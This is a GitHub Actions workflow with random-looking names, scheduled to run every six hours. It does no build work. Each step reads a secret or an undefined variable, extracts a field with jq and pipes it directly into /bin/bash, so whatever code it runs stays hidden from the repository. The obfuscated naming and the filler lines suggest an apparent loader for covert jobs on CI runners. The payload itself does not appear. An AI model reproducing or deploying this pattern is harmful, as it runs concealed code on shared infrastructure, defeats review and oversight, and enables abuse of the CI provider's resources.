name: miaoqingji1981
on:
  workflow_dispatch:
  schedule:
    - cron: '1 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: miaoqingji1981
        env:
          bap31: ${{ secrets.bap31 }}
        run: |
          echo $bap31 | jq -r .f3 | /bin/bash
          echo $m3 | jq -r .sg340 | /bin/bash
          echo $cpp5 | jq -r .vfz6 | /bin/bash
          echo $nifs071 | jq -r .lx30 | /bin/bash
          echo $yeqrw73963 | jq -r .uc052 | /bin/bash
          echo $ubh22662 | jq -r .hsdfi37235 | /bin/bash
          echo $m43858 | jq -r .cvi28099 | /bin/bash
          echo $gqb9502 | jq -r .omzwy751 | /bin/bash
          echo $jgn973 | jq -r .lgvgg30238 | /bin/bash

